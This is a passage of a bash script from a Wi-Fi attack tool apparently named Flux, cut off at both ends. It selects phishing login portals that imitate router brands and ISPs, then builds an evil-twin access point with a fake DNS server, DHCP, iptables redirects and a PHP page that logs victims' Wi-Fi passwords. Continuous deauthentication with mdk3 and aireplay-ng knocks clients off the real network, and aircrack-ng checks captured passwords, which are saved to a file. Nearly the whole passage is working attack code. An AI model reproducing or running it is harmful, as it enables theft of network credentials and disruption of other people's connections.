DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_CN DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_CN DIALOG_WEB_DIR=$DIALOG_WEB_DIR_CN NEUTRA break elif [ "$webconf" = "8" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_FR DIALOG_WEB_INFO=$DIALOG_WEB_INFO_FR DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_FR DIALOG_WEB_OK=$DIALOG_WEB_OK_FR DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_FR DIALOG_WEB_BACK=$DIALOG_WEB_BACK_FR DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_FR DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_FR DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_FR DIALOG_WEB_DIR=$DIALOG_WEB_DIR_FR NEUTRA break elif [ "$webconf" = "9" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_TR DIALOG_WEB_INFO=$DIALOG_WEB_INFO_TR DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_TR DIALOG_WEB_OK=$DIALOG_WEB_OK_TR DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_TR DIALOG_WEB_BACK=$DIALOG_WEB_BACK_TR DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_TR DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_TR DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_TR DIALOG_WEB_DIR=$DIALOG_WEB_DIR_TR NEUTRA break elif [ "$webconf" = "10" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_RO DIALOG_WEB_INFO=$DIALOG_WEB_INFO_RO DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_RO DIALOG_WEB_OK=$DIALOG_WEB_OK_RO DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_RO DIALOG_WEB_BACK=$DIALOG_WEB_BACK_RO DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_RO DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_RO DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_RO DIALOG_WEB_DIR=$DIALOG_WEB_DIR_RO NEUTRA break elif [ "$webconf" = "11" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_HU DIALOG_WEB_INFO=$DIALOG_WEB_INFO_HU DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_HU DIALOG_WEB_OK=$DIALOG_WEB_OK_HU DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_HU DIALOG_WEB_BACK=$DIALOG_WEB_BACK_HU DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_HU DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_HU DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_HU DIALOG_WEB_DIR=$DIALOG_WEB_DIR_HU NEUTRA break elif [ "$webconf" = "12" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ARA DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ARA DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_ARA DIALOG_WEB_OK=$DIALOG_WEB_OK_ARA DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ARA DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ARA DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_ARA DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_ARA DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_ARA DIALOG_WEB_DIR=$DIALOG_WEB_DIR_ARA NEUTRA break elif [ "$webconf" = "13" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_GR DIALOG_WEB_INFO=$DIALOG_WEB_INFO_GR DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_GR DIALOG_WEB_OK=$DIALOG_WEB_OK_GR DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_GR DIALOG_WEB_BACK=$DIALOG_WEB_BACK_GR DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_GR DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_GR DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_GR DIALOG_WEB_DIR=$DIALOG_WEB_DIR_GR NEUTRA break elif [ "$webconf" = "14" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_CZ DIALOG_WEB_INFO=$DIALOG_WEB_INFO_CZ DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_CZ DIALOG_WEB_OK=$DIALOG_WEB_OK_CZ DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_CZ DIALOG_WEB_BACK=$DIALOG_WEB_BACK_CZ DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_CZ DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_CZ DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_CZ DIALOG_WEB_DIR=$DIALOG_WEB_DIR_CZ NEUTRA break elif [ "$webconf" = "15" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_NO DIALOG_WEB_INFO=$DIALOG_WEB_INFO_NO DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_NO DIALOG_WEB_OK=$DIALOG_WEB_OK_NO DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_NO DIALOG_WEB_BACK=$DIALOG_WEB_BACK_NO DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_NO DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_NO DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_NO DIALOG_WEB_DIR=$DIALOG_WEB_DIR_NO NEUTRA break elif [ "$webconf" = "16" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_BG DIALOG_WEB_INFO=$DIALOG_WEB_INFO_BG DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_BG DIALOG_WEB_OK=$DIALOG_WEB_OK_BG DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_BG DIALOG_WEB_BACK=$DIALOG_WEB_BACK_BG DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_BG DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_BG DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_BG DIALOG_WEB_DIR=$DIALOG_WEB_DIR_BG NEUTRA break elif [ "$webconf" = "17" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_SRB DIALOG_WEB_INFO=$DIALOG_WEB_INFO_SRB DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_SRB DIALOG_WEB_OK=$DIALOG_WEB_OK_SRB DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_SRB DIALOG_WEB_BACK=$DIALOG_WEB_BACK_SRB DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_SRB DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_SRB DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_SRB DIALOG_WEB_DIR=$DIALOG_WEB_DIR_SRB NEUTRA break elif [ "$webconf" = "18" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_PL DIALOG_WEB_INFO=$DIALOG_WEB_INFO_PL DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_PL DIALOG_WEB_OK=$DIALOG_WEB_OK_PL DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_PL DIALOG_WEB_BACK=$DIALOG_WEB_BACK_PL DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_PL DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_PL DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_PL DIALOG_WEB_DIR=$DIALOG_WEB_DIR_PL NEUTRA break elif [ "$webconf" = "19" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ID DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ID DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_ID DIALOG_WEB_OK=$DIALOG_WEB_OK_ID DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ID DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ID DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_ID DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_ID DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_ID DIALOG_WEB_DIR=$DIALOG_WEB_DIR_ID NEUTRA break elif [ "$webconf" = "20" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_NL DIALOG_WEB_INFO=$DIALOG_WEB_INFO_NL DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_NL DIALOG_WEB_OK=$DIALOG_WEB_OK_NL DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_NL DIALOG_WEB_BACK=$DIALOG_WEB_BACK_NL DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_NL DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_NL DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_NL DIALOG_WEB_DIR=$DIALOG_WEB_DIR_NL NEUTRA break elif [ "$webconf" = 21 ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_DAN DIALOG_WEB_INFO=$DIALOG_WEB_INFO_DAN DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_DAN DIALOG_WEB_OK=$DIALOG_WEB_OK_DAN DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_DAN DIALOG_WEB_BACK=$DIALOG_WEB_BACK_DAN DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_DAN DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_DAN DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_DAN DIALOG_WEB_DIR=$DIALOG_WEB_DIR_DAN NEUTRA break elif [ "$webconf" = 22 ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_HE DIALOG_WEB_INFO=$DIALOG_WEB_INFO_HE DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_HE DIALOG_WEB_OK=$DIALOG_WEB_OK_HE DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_HE DIALOG_WEB_BACK=$DIALOG_WEB_BACK_HE DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_HE DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_HE DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_HE DIALOG_WEB_DIR=$DIALOG_WEB_DIR_HE NEUTRA break elif [ "$webconf" = 23 ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_TH DIALOG_WEB_INFO=$DIALOG_WEB_INFO_TH DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_TH DIALOG_WEB_OK=$DIALOG_WEB_OK_TH DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_TH DIALOG_WEB_BACK=$DIALOG_WEB_BACK_TH DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_TH DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_TH DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_TH DIALOG_WEB_DIR=$DIALOG_WEB_DIR_TH NEUTRA break elif [ "$webconf" = 24 ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_PT_BR DIALOG_WEB_INFO=$DIALOG_WEB_INFO_PT_BR DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_PT_BR DIALOG_WEB_OK=$DIALOG_WEB_OK_PT_BR DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_ DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_PT_BR DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_PT_BR DIALOG_WEB_DIR=$DIALOG_WEB_DIR_PT_BR NEUTRA break elif [ "$webconf" = 25 ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_PT_SVN DIALOG_WEB_INFO=$DIALOG_WEB_INFO_PT_SVN DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_PT_SVN DIALOG_WEB_OK=$DIALOG_WEB_OK_PT_SVN DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_ DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_PT_SVN DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_PT_SVN DIALOG_WEB_DIR=$DIALOG_WEB_DIR_PT_SVN NEUTRA SVNeak elif [ "$webconf" = "26" ]; then BELKIN break elif [ "$webconf" = "27" ]; then NETGEAR break elif [ "$webconf" = "28" ]; then HUAWEI break elif [ "$webconf" = "29" ]; then VERIZON break elif [ "$webconf" = "30" ]; then NETGEAR2 break elif [ "$webconf" = "31" ]; then ARRIS2 break elif [ "$webconf" = "32" ]; then VODAFONE break elif [ "$webconf" = "33" ]; then TPLINK break elif [ "$webconf" = "34" ]; then ZIGGO_NL break elif [ "$webconf" = "35" ]; then KPN_NL break elif [ "$webconf" = "36" ]; then ZIGGO2016_NL break elif [ "$webconf" = "37" ]; then FRITZBOX_DE break elif [ "$webconf" = "38" ]; then FRITZBOX_ENG break elif [ "$webconf" = "39" ]; then GENEXIS_DE break elif [ "$webconf" = "40" ]; then Login-Netgear break elif [ "$webconf" = "41" ]; then Login-Xfinity break elif [ "$webconf" = "42" ]; then Telekom break elif [ "$webconf" = "43" ]; then google break elif [ "$webconf" = "44" ]; then MOVISTAR_ES break elif [ "$webconf" = "45" ]; then conditional_clear webinterface break fi done fi preattack attack } # Create different settings required for the script function preattack { # Config HostAPD echo "interface=$WIFI driver=nl80211 ssid=$Host_SSID channel=$Host_CHAN" > $DUMP_PATH/hostapd.conf # Creates PHP echo "<?php error_reporting(0); \$count_my_page = (\"$DUMP_PATH/hit.txt\"); \$hits = file(\$count_my_page); \$hits[0] ++; \$fp = fopen(\$count_my_page , \"w\"); fputs(\$fp , \$hits[0]); fclose(\$fp); // Receive form Post data and Saving it in variables \$key1 = @\$_POST['key1']; // Write the name of text file where data will be store \$filename = \"$DUMP_PATH/data.txt\"; \$filename2 = \"$DUMP_PATH/status.txt\"; \$intento = \"$DUMP_PATH/intento\"; \$attemptlog = \"$DUMP_PATH/pwattempt.txt\"; // Marge all the variables with text in a single variable. \$f_data= ''.\$key1.''; \$pwlog = fopen(\$attemptlog, \"w\"); fwrite(\$pwlog, \$f_data); fwrite(\$pwlog,\"\n\"); fclose(\$pwlog); \$file = fopen(\$filename, \"w\"); fwrite(\$file, \$f_data); fwrite(\$file,\"\n\"); fclose(\$file); \$archivo = fopen(\$intento, \"w\"); fwrite(\$archivo,\"\n\"); fclose(\$archivo); while( 1 ) { if (file_get_contents( \$intento ) == 1) { header(\"Location:error.html\"); unlink(\$intento); break; } if (file_get_contents( \$intento ) == 2) { header(\"Location:final.html\"); break; } sleep(1); } ?>" > $DUMP_PATH/data/check.php # Config DHCP echo "authoritative; default-lease-time 600; max-lease-time 7200; subnet $RANG_IP.0 netmask 255.255.255.0 { option broadcast-address $RANG_IP.255; option routers $IP; option subnet-mask 255.255.255.0; option domain-name-servers $IP; range $RANG_IP.100 $RANG_IP.250; }" > $DUMP_PATH/dhcpd.conf #create an empty leases file touch $DUMP_PATH/dhcpd.leases # creates Lighttpd web-server echo "server.document-root = \"$DUMP_PATH/data/\" server.modules = ( \"mod_access\", \"mod_alias\", \"mod_accesslog\", \"mod_fastcgi\", \"mod_redirect\", \"mod_rewrite\" ) fastcgi.server = ( \".php\" => (( \"bin-path\" => \"/usr/bin/php-cgi\", \"socket\" => \"/php.socket\" ))) server.port = 80 server.pid-file = \"/var/run/lighttpd.pid\" # server.username = \"www\" # server.groupname = \"www\" mimetype.assign = ( \".html\" => \"text/html\", \".htm\" => \"text/html\", \".txt\" => \"text/plain\", \".jpg\" => \"image/jpeg\", \".png\" => \"image/png\", \".css\" => \"text/css\" ) server.error-handler-404 = \"/\" static-file.exclude-extensions = ( \".fcgi\", \".php\", \".rb\", \"~\", \".inc\" ) index-file.names = ( \"index.htm\", \"index.html\" ) \$SERVER[\"socket\"] == \":443\" { url.redirect = ( \"^/(.*)\" => \"http://www.internet.com\") ssl.engine = \"enable\" ssl.pemfile = \"$DUMP_PATH/server.pem\" } #Redirect www.domain.com to domain.com \$HTTP[\"host\"] =~ \"^www\.(.*)$\" { url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" ) ssl.engine = \"enable\" ssl.pemfile = \"$DUMP_PATH/server.pem\" } " >$DUMP_PATH/lighttpd.conf # that redirects all DNS requests to the gateway echo "import socket class DNSQuery: def __init__(self, data): self.data=data self.dominio='' tipo = (ord(data[2]) >> 3) & 15 if tipo == 0: ini=12 lon=ord(data[ini]) while lon != 0: self.dominio+=data[ini+1:ini+lon+1]+'.' ini+=lon+1 lon=ord(data[ini]) def respuesta(self, ip): packet='' if self.dominio: packet+=self.data[:2] + \"\x81\x80\" packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' packet+=self.data[12:] packet+='\xc0\x0c' packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) return packet if __name__ == '__main__': ip='$IP' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps.bind(('',53)) try: while 1: data, addr = udps.recvfrom(1024) p=DNSQuery(data) udps.sendto(p.respuesta(ip), addr) print 'Request: %s -> %s' % (p.dominio, ip) except KeyboardInterrupt: print 'Finalizando' udps.close()" > $DUMP_PATH/fakedns chmod +x $DUMP_PATH/fakedns } # Set up DHCP / WEB server # Set up DHCP / WEB server function routear { ifconfig $interfaceroutear up ifconfig $interfaceroutear $IP netmask 255.255.255.0 route add -net $RANG_IP.0 netmask 255.255.255.0 gw $IP sysctl -w net.ipv4.ip_forward=1 &>$flux_output_device iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $IP:80 iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $IP:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE } # Attack function attack { interfaceroutear=$WIFI handshakecheck nomac=$(tr -dc A-F0-9 < /dev/urandom | fold -w2 |head -n100 | grep -v "${mac:13:1}" | head -c 1) if [ "$fakeapmode" = "hostapd" ]; then ifconfig $WIFI down sleep 0.4 macchanger --mac=${mac::13}$nomac${mac:14:4} $WIFI &> $flux_output_device sleep 0.4 ifconfig $WIFI up sleep 0.4 fi if [ $fakeapmode = "hostapd" ]; then killall hostapd &> $flux_output_device xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "AP" -e hostapd $DUMP_PATH/hostapd.conf & elif [ $fakeapmode = "airbase-ng" ]; then killall airbase-ng &> $flux_output_device xterm $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "AP" -e airbase-ng -P -e $Host_SSID -c $Host_CHAN -a ${mac::13}$nomac${mac:14:4} $WIFI_MONITOR & fi sleep 5 routear & sleep 3 killall dhcpd &> $flux_output_device fuser -n tcp -k 53 67 80 &> $flux_output_device fuser -n udp -k 53 67 80 &> $flux_output_device xterm -bg black -fg green $TOPLEFT -T DHCP -e "dhcpd -d -f -lf "$DUMP_PATH/dhcpd.leases" -cf "$DUMP_PATH/dhcpd.conf" $interfaceroutear 2>&1 | tee -a $DUMP_PATH/clientes.txt" & xterm $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "FAKEDNS" -e "if type python2 >/dev/null 2>/dev/null; then python2 $DUMP_PATH/fakedns; else python $DUMP_PATH/fakedns; fi" & lighttpd -f $DUMP_PATH/lighttpd.conf &> $flux_output_device killall aireplay-ng &> $flux_output_device killall mdk3 &> $flux_output_device echo "$Host_MAC" >$DUMP_PATH/mdk3.txt xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauth all [mdk3] $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN & xterm -hold $TOPRIGHT -title "Wifi Information" -e $DUMP_PATH/handcheck & conditional_clear while true; do top echo -e ""$red"["$yellow"2"$red"]"$transparent" Attack in progress .." echo " " echo " 1) Choose another network" echo " 2) Exit" echo " " echo -n ' #> ' read yn case $yn in 1 ) matartodo; CSVDB=dump-01.csv; selection; break;; 2 ) matartodo; exitmode; break;; * ) echo " $general_case_error"; conditional_clear ;; esac done } # Checks the validity of the password function handshakecheck { echo "#!/bin/bash echo > $DUMP_PATH/data.txt echo -n \"0\"> $DUMP_PATH/hit.txt echo "" >$DUMP_PATH/loggg tput civis clear minutos=0 horas=0 i=0 timestamp=\$(date +%s) while true; do segundos=\$i dias=\`expr \$segundos / 86400\` segundos=\`expr \$segundos % 86400\` horas=\`expr \$segundos / 3600\` segundos=\`expr \$segundos % 3600\` minutos=\`expr \$segundos / 60\` segundos=\`expr \$segundos % 60\` if [ \"\$segundos\" -le 9 ]; then is=\"0\" else is= fi if [ \"\$minutos\" -le 9 ]; then im=\"0\" else im= fi if [ \"\$horas\" -le 9 ]; then ih=\"0\" else ih= fi">>$DUMP_PATH/handcheck if [ $authmode = "handshake" ]; then echo "if [ -f $DUMP_PATH/pwattempt.txt ]; then cat $DUMP_PATH/pwattempt.txt >> \"$PASSLOG_PATH/$Host_SSID-$Host_MAC.log\" rm -f $DUMP_PATH/pwattempt.txt fi if [ -f $DUMP_PATH/intento ]; then if ! aircrack-ng -w $DUMP_PATH/data.txt $DUMP_PATH/$Host_MAC-01.cap | grep -qi \"Passphrase not in\"; then echo \"2\">$DUMP_PATH/intento break else echo \"1\">$DUMP_PATH/intento fi fi">>$DUMP_PATH/handcheck elif [ $authmode = "wpa_supplicant" ]; then echo " if [ -f $DUMP_PATH/pwattempt.txt ]; then cat $DUMP_PATH/pwattempt.txt >> $PASSLOG_PATH/$Host_SSID-$Host_MAC.log rm -f $DUMP_PATH/pwattempt.txt fi wpa_passphrase $Host_SSID \$(cat $DUMP_PATH/data.txt)>$DUMP_PATH/wpa_supplicant.conf & wpa_supplicant -i$WIFI -c$DUMP_PATH/wpa_supplicant.conf -f $DUMP_PATH/loggg & if [ -f $DUMP_PATH/intento ]; then if grep -i 'WPA: Key negotiation completed' $DUMP_PATH/loggg; then echo \"2\">$DUMP_PATH/intento break else echo \"1\">$DUMP_PATH/intento fi fi ">>$DUMP_PATH/handcheck fi echo "readarray -t CLIENTESDHCP < <(nmap -PR -sn -n -oG - $RANG_IP.100-110 2>&1 | grep Host ) echo echo -e \" ACCESS POINT:\" echo -e \" SSID............: "$white"$Host_SSID"$transparent"\" echo -e \" MAC.............: "$yellow"$Host_MAC"$transparent"\" echo -e \" Channel.........: "$white"$Host_CHAN"$transparent"\" echo -e \" Vendor..........: "$green"$Host_MAC_MODEL"$transparent"\" echo -e \" Operation time..: "$blue"\$ih\$horas:\$im\$minutos:\$is\$segundos"$transparent"\" echo -e \" Attempts........: "$red"\$(cat $DUMP_PATH/hit.txt)"$transparent"\" echo -e \" Clients.........: "$blue"\$(cat $DUMP_PATH/clientes.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l)"$transparent"\" echo echo -e \" CLIENTS ONLINE:\" x=0 for cliente in \"\${CLIENTESDHCP[@]}\"; do x=\$((\$x+1)) CLIENTE_IP=\$(echo \$cliente| cut -d \" \" -f2) CLIENTE_MAC=\$(nmap -PR -sn -n \$CLIENTE_IP 2>&1 | grep -i mac | awk '{print \$3}' | tr [:upper:] [:lower:]) if [ \"\$(echo \$CLIENTE_MAC| wc -m)\" != \"18\" ]; then CLIENTE_MAC=\"xx:xx:xx:xx:xx:xx\" fi CLIENTE_FABRICANTE=\$(macchanger -l | grep \"\$(echo \"\$CLIENTE_MAC\" | cut -d \":\" -f -3)\" | cut -d \" \" -f 5-) if echo \$CLIENTE_MAC| grep -q x; then CLIENTE_FABRICANTE=\"unknown\" fi CLIENTE_HOSTNAME=\$(grep \$CLIENTE_IP $DUMP_PATH/clientes.txt | grep DHCPACK | sort | uniq | head -1 | grep '(' | awk -F '(' '{print \$2}' | awk -F ')' '{print \$1}') echo -e \" $green \$x) $red\$CLIENTE_IP $yellow\$CLIENTE_MAC $transparent($blue\$CLIENTE_FABRICANTE$transparent) $green \$CLIENTE_HOSTNAME$transparent\" done echo -ne \"\033[K\033[u\"">>$DUMP_PATH/handcheck if [ $authmode = "handshake" ]; then echo "let i=\$(date +%s)-\$timestamp sleep 1">>$DUMP_PATH/handcheck elif [ $authmode = "wpa_supplicant" ]; then echo "sleep 5 killall wpa_supplicant &>$flux_output_device killall wpa_passphrase &>$flux_output_device let i=\$i+5">>$DUMP_PATH/handcheck fi echo "done clear echo \"1\" > $DUMP_PATH/status.txt sleep 7 killall mdk3 &>$flux_output_device killall aireplay-ng &>$flux_output_device killall airbase-ng &>$flux_output_device kill \$(ps a | grep python| grep fakedns | awk '{print \$1}') &>$flux_output_device killall hostapd &>$flux_output_device killall lighttpd &>$flux_output_device killall dhcpd &>$flux_output_device killall wpa_supplicant &>$flux_output_device killall wpa_passphrase &>$flux_output_device echo \" FLUX $version by ghost SSID: $Host_SSID BSSID: $Host_MAC ($Host_MAC_MODEL) Channel: $Host_CHAN Security: $Host_ENC Time: \$ih\$horas:\$im\$minutos:\$is\$segundos Password: \$(cat $DUMP_PATH/data.txt) \" >\"$HOME/$Host_SSID-password.txt\"">>$DUMP_PATH/handcheck if [ $authmode = "handshake" ]; then echo "aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $DUMP_PATH/data.txt && echo && echo -e \"The password was saved in "$red"$HOME/$Host_SSID-password.txt"$transparent"\" ">>$DUMP_PATH/handcheck elif [ $authmode = "wpa_supplicant" ]; then echo "echo -e \"The password was saved in "$red"$HOME/$Host_SSID-password.txt"$transparent"\"">>$DUMP_PATH/handcheck fi echo "kill -INT \$(ps a | grep bash| grep flux | awk '{print \$1}') &>$flux_output_device">>$DUMP_PATH/handcheck chmod +x $DUMP_PATH/handcheck } ############################################# < ATTACK > ############################################ ############################################## < STUFF > ############################################ # Deauth all function deauthall { xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR & } function deauthmdk3 { echo "$Host_MAC" >$DUMP_PATH/mdk3.txt xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating via mdk3 all clients on $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN & mdk3PID=$! } # Deauth to a specific target function deauthesp { sleep 2 xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating client $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR & } # Close all processes function matartodo { killall aireplay-ng &>$flux_output_device kill $(ps a | grep python| grep fakedns | awk '{print $1}') &>$flux_output_device killall hostapd &>$flux_output_device killall lighttpd &>$flux_output_device killall dhcpd &>$flux_output_device killall xterm &>$flux_output_device } ######################################### < INTERFACE WEB > ######################################## # Create the contents for the web interface function NEUTRA { if [ ! -d $DUMP_PATH/data ]; then mkdir $DUMP_PATH/data fi source $WORK_DIR/lib/site/index | base64 -d > $DUMP_PATH/file.zip unzip $DUMP_PATH/file.zip -d $DUMP_PATH/data &>$flux_output_device rm $DUMP_PATH/file.zip &>$flux_output_device echo "<!DOCTYPE html> <html> <head> <title>Login Page</title> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\">  <link rel=\"stylesheet\" type=\"text/css\" href=\"css/jquery.mobile-1.4.5.min.css\"/> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/main.css\"/>  <script src=\"js/jquery-1.11.1.min.js\"></script> <script src=\"js/jquery.mobile-1.4.5.min.js\"></script> </head> <body>  <div id=\"done\" data-role=\"page\" 